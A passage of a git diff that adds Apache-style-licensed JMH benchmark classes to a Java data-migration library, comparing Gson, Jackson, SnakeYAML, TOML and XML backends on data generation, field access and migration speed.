+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlToJson(final Blackhole blackhole) { + final JsonNode result = this.jacksonJsonOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot); + blackhole.consume(result); + } + + // ==================== SnakeYAML <-> Jackson YAML Conversions ==================== + + /** + * Benchmarks conversion from SnakeYAML native types to Jackson YAML JsonNode. + * + *

Measures conversion between two YAML libraries with different internal + * representations (native Java types vs JsonNode).

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlToJacksonYaml(final Blackhole blackhole) { + final JsonNode result = this.jacksonYamlOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson YAML JsonNode to SnakeYAML native types. + * + *

Measures reverse conversion from JsonNode to native Java Maps/Lists.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlToSnakeYaml(final Blackhole blackhole) { + final Object result = this.snakeYamlOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java new file mode 100644 index 0000000..1a87c58 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java @@ -0,0 +1,410 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.jetbrains.annotations.Nullable; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark comparing JSON DynamicOps implementations: Gson vs Jackson. + * + *

This benchmark measures the performance of JSON-based operations using two + * different underlying libraries: Google Gson ({@link GsonOps}) and Jackson Databind + * ({@link JacksonJsonOps}). The results help determine which implementation is more + * suitable for specific use cases.

+ * + *

Benchmark Categories

+ * + *

Data Generation

+ *

Measure Dynamic object construction performance:

+ *
    + *
  • {@link #gsonGenerate} - Create Dynamic using GsonOps
  • + *
  • {@link #jacksonGenerate} - Create Dynamic using JacksonJsonOps
  • + *
+ * + *

Field Access

+ *

Measure field read operations on existing data:

+ *
    + *
  • {@link #gsonFieldRead} - Read field from Gson-backed Dynamic
  • + *
  • {@link #jacksonFieldRead} - Read field from Jackson-backed Dynamic
  • + *
+ * + *

Field Modification

+ *

Measure field write/set operations:

+ *
    + *
  • {@link #gsonFieldSet} - Set field on Gson-backed Dynamic
  • + *
  • {@link #jacksonFieldSet} - Set field on Jackson-backed Dynamic
  • + *
+ * + *

Migration

+ *

Measure DataFixer migration performance:

+ *
    + *
  • {@link #gsonMigration} - Apply fix to Gson-backed data
  • + *
  • {@link #jacksonMigration} - Apply fix to Jackson-backed data
  • + *
  • {@link #crossFormatMigrationJacksonInput} - Cross-format migration scenario
  • + *
+ * + *

Implementations Compared

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ImplementationLibraryNode TypeCharacteristics
{@link GsonOps}Google Gson{@code JsonElement}Simple API, smaller footprint, widely used
{@link JacksonJsonOps}Jackson Databind{@code JsonNode}Feature-rich, streaming support, high performance
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
payloadSizeSMALL, MEDIUM, LARGETest data complexity
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Usage

+ *
{@code
+ * # Run all JSON benchmarks
+ * java -jar benchmarks.jar JsonBenchmark
+ *
+ * # Compare only field access performance
+ * java -jar benchmarks.jar "JsonBenchmark.*FieldRead"
+ *
+ * # Run Gson-only benchmarks
+ * java -jar benchmarks.jar "JsonBenchmark.gson.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar JsonBenchmark -p payloadSize=LARGE
+ * }
+ * + * @author Erik Pförtner + * @see YamlBenchmark + * @see TomlXmlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class JsonBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *

References the first string field generated by {@link BenchmarkDataGenerator}.

+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *

Injected by JMH to run benchmarks across different data sizes.

+ */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + private PayloadSize payloadSize; + + /** + * Google Gson DynamicOps implementation. + */ + private GsonOps gsonOps; + + /** + * Jackson Databind DynamicOps implementation. + */ + private JacksonJsonOps jacksonOps; + + /** + * Pre-generated test data using Gson. + */ + private Dynamic gsonData; + + /** + * Pre-generated test data using Jackson. + */ + private Dynamic jacksonData; + + /** + * DataFixer for Gson-based migrations. + */ + private DataFixer gsonFixer; + + /** + * Optional DataFixer for Jackson-based migrations. + * + *

May be {@code null} if no dedicated Jackson fixer is configured. + * In that case, cross-format migration behavior is measured instead.

+ */ + @Nullable + private DataFixer jacksonFixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixers. + * + *

Both Gson and Jackson data are pre-generated to isolate benchmark + * measurements from data creation overhead (except for generation benchmarks).

+ */ + @Setup(Level.Trial) + public void setup() { + this.gsonOps = GsonOps.INSTANCE; + this.jacksonOps = JacksonJsonOps.INSTANCE; + + this.gsonData = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize); + this.jacksonData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + + this.gsonFixer = BenchmarkBootstrap.createSingleFixFixer(); + + // If you have a dedicated Jackson fixer, wire it here. Otherwise keep it null and measure cross-format explicitly. + // Example (if you add it later): this.jacksonFixer = BenchmarkBootstrap.createSingleFixFixerJackson(); + this.jacksonFixer = null; + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using GsonOps. + * + *

Measures the time to create a complete test data structure using + * Gson as the underlying JSON representation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonJsonOps. + * + *

Measures the time to create a complete test data structure using + * Jackson as the underlying JSON representation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on Gson-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * Gson-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonFieldRead(final Blackhole blackhole) { + final Dynamic field = this.gsonData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on Jackson-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * Jackson-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonFieldRead(final Blackhole blackhole) { + final Dynamic field = this.jacksonData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on Gson-backed Dynamic. + * + *

Measures the time to add a new field to a Gson-based Dynamic object. + * This operation typically creates a new Dynamic with the modified content.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonFieldSet(final Blackhole blackhole) { + final Dynamic result = this.gsonData.set( + "newField", + this.gsonData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on Jackson-backed Dynamic. + * + *

Measures the time to add a new field to a Jackson-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonFieldSet(final Blackhole blackhole) { + final Dynamic result = this.jacksonData.set( + "newField", + this.jacksonData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on Gson-backed data. + * + *

Measures the time to apply a single fix migration to Gson-based + * Dynamic data. This represents the typical migration scenario where + * both fixer and data use the same DynamicOps implementation.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonMigration(final Blackhole blackhole) { + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.gsonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on Jackson-backed data. + * + *

If a dedicated Jackson fixer is available, measures native Jackson + * migration. Otherwise, falls back to cross-format migration using the + * Gson-based fixer with Jackson input data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonMigration(final Blackhole blackhole) { + if (this.jacksonFixer == null) { + // No dedicated Jackson fixer available -> this would not be a fair "Jackson migration" benchmark. + // Measure the cross-format behavior explicitly instead. + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + return; + } + + final Dynamic result = this.jacksonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks cross-format migration with Jackson input and Gson-based fixer. + * + *

Measures the performance overhead when the fixer's DynamicOps differs + * from the input data's DynamicOps. This scenario is common when migrating + * data from various sources through a centralized fixer.

+ * + *

Comparing this benchmark with {@link #gsonMigration} reveals the + * overhead of format conversion during migration.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void crossFormatMigrationJacksonInput(final Blackhole blackhole) { + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java new file mode 100644 index 0000000..2dc134c --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java @@ -0,0 +1,358 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.toml.jackson.JacksonTomlOps; +import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for TOML and XML DynamicOps implementations via Jackson. + * + *

This benchmark measures the performance of TOML and XML format operations + * using Jackson-based implementations ({@link JacksonTomlOps} and {@link JacksonXmlOps}). + * Both formats share Jackson's unified API, enabling direct performance comparison.

+ * + *

Benchmark Categories

+ * + *

Data Generation

+ *

Measure Dynamic object construction performance:

+ *
    + *
  • {@link #tomlGenerate} - Create Dynamic using JacksonTomlOps
  • + *
  • {@link #xmlGenerate} - Create Dynamic using JacksonXmlOps
  • + *
+ * + *

Field Access

+ *

Measure field read operations on existing data:

+ *
    + *
  • {@link #tomlFieldRead} - Read field from TOML-backed Dynamic
  • + *
  • {@link #xmlFieldRead} - Read field from XML-backed Dynamic
  • + *
+ * + *

Field Modification

+ *

Measure field write/set operations:

+ *
    + *
  • {@link #tomlFieldSet} - Set field on TOML-backed Dynamic
  • + *
  • {@link #xmlFieldSet} - Set field on XML-backed Dynamic
  • + *
+ * + *

Migration

+ *

Measure DataFixer migration performance:

+ *
    + *
  • {@link #tomlMigration} - Apply fix to TOML-backed data
  • + *
  • {@link #xmlMigration} - Apply fix to XML-backed data
  • + *
+ * + *

Implementations

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ImplementationLibraryNode TypeUse Case
{@link JacksonTomlOps}Jackson Dataformat TOML{@code JsonNode}Configuration files, Rust ecosystem integration
{@link JacksonXmlOps}Jackson Dataformat XML{@code JsonNode}Legacy systems, SOAP/REST APIs, document formats
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
payloadSizeSMALL, MEDIUMTest data complexity (LARGE excluded for performance)
+ * + *

Note: The LARGE payload size is excluded from this benchmark because + * TOML and XML serialization typically have higher overhead than JSON/YAML, + * making large payloads impractical for typical use cases.

+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Usage

+ *
{@code
+ * # Run all TOML/XML benchmarks
+ * java -jar benchmarks.jar TomlXmlBenchmark
+ *
+ * # Run TOML-only benchmarks
+ * java -jar benchmarks.jar "TomlXmlBenchmark.toml.*"
+ *
+ * # Run XML-only benchmarks
+ * java -jar benchmarks.jar "TomlXmlBenchmark.xml.*"
+ *
+ * # Compare generation performance
+ * java -jar benchmarks.jar "TomlXmlBenchmark.*Generate"
+ * }
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see YamlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.toml.jackson.JacksonTomlOps + * @see de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class TomlXmlBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *

References the first string field generated by {@link BenchmarkDataGenerator}.

+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *

Limited to SMALL and MEDIUM to avoid excessive benchmark runtime + * with the higher overhead of TOML and XML processing.

+ */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * Jackson TOML DynamicOps implementation. + */ + private JacksonTomlOps tomlOps; + + /** + * Jackson XML DynamicOps implementation. + */ + private JacksonXmlOps xmlOps; + + /** + * Pre-generated test data using TOML format. + */ + private Dynamic tomlData; + + /** + * Pre-generated test data using XML format. + */ + private Dynamic xmlData; + + /** + * DataFixer for migration benchmarks. + */ + private DataFixer fixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixer. + * + *

Both TOML and XML data are pre-generated to isolate benchmark + * measurements from data creation overhead.

+ */ + @Setup(Level.Trial) + public void setup() { + this.tomlOps = JacksonTomlOps.INSTANCE; + this.xmlOps = JacksonXmlOps.INSTANCE; + + this.tomlData = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize); + this.xmlData = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize); + + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using JacksonTomlOps. + * + *

Measures the time to create a complete test data structure using + * Jackson's TOML dataformat module.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonXmlOps. + * + *

Measures the time to create a complete test data structure using + * Jackson's XML dataformat module.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on TOML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * TOML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.tomlData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on XML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing + * XML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.xmlData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on TOML-backed Dynamic. + * + *

Measures the time to add a new field to a TOML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.tomlData.set( + "newField", + this.tomlData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on XML-backed Dynamic. + * + *

Measures the time to add a new field to an XML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.xmlData.set( + "newField", + this.xmlData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on TOML-backed data. + * + *

Measures the time to apply a single fix migration to TOML-based + * Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.tomlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on XML-backed data. + * + *

Measures the time to apply a single fix migration to XML-based + * Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.xmlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java new file mode 100644 index 0000000..c0f2862 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java @@ -0,0 +1,354 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark comparing YAML DynamicOps implementations: SnakeYAML vs Jackson YAML. + * + *

This benchmark measures the performance of YAML-based operations using two + * different underlying libraries: SnakeYAML ({@link SnakeYamlOps}) and Jackson YAML + * ({@link JacksonYamlOps}). YAML is commonly used for configuration files and + * human-readable data serialization.

+ * + *

Benchmark Categories

+ * + *

Data Generation

+ *

Measure Dynamic object construction performance:

+ *
    + *
  • {@link #snakeYamlGenerate} - Create Dynamic using SnakeYamlOps
  • + *
  • {@link #jacksonYamlGenerate} - Create Dynamic using JacksonYamlOps
  • + *
+ * + *

Field Access

+ *

Measure field read operations on existing data:

+ *
    + *
  • {@link #snakeYamlFieldRead} - Read field from SnakeYAML-backed Dynamic
  • + *
  • {@link #jacksonYamlFieldRead} - Read field from Jackson YAML-backed Dynamic
  • + *
+ * + *

Field Modification

+ *

Measure field write/set operations:

+ *
    + *
  • {@link #snakeYamlFieldSet} - Set field on SnakeYAML-backed Dynamic
  • + *
  • {@link #jacksonYamlFieldSet} - Set field on Jackson YAML-backed Dynamic
  • + *
+ * + *

Migration

+ *

Measure DataFixer migration performance:

+ *
    + *
  • {@link #snakeYamlMigration} - Apply fix to SnakeYAML-backed data
  • + *
  • {@link #jacksonYamlMigration} - Apply fix to Jackson YAML-backed data
  • + *
+ * + *

Implementations Compared

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ImplementationLibraryNode TypeCharacteristics
{@link SnakeYamlOps}SnakeYAML{@code Object} (native Java types)Native YAML library, uses Maps/Lists, anchors & aliases support
{@link JacksonYamlOps}Jackson Dataformat YAML{@code JsonNode}Unified Jackson API, shares code with JSON, streaming support
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
payloadSizeSMALL, MEDIUM, LARGETest data complexity
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Usage

+ *
{@code
+ * # Run all YAML benchmarks
+ * java -jar benchmarks.jar YamlBenchmark
+ *
+ * # Compare only generation performance
+ * java -jar benchmarks.jar "YamlBenchmark.*Generate"
+ *
+ * # Run SnakeYAML-only benchmarks
+ * java -jar benchmarks.jar "YamlBenchmark.snakeYaml.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar YamlBenchmark -p payloadSize=MEDIUM
+ * }
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see TomlXmlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps + * @see de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class YamlBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *

References the first string field generated by {@link BenchmarkDataGenerator}.

+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *

Injected by JMH to run benchmarks across different data sizes.

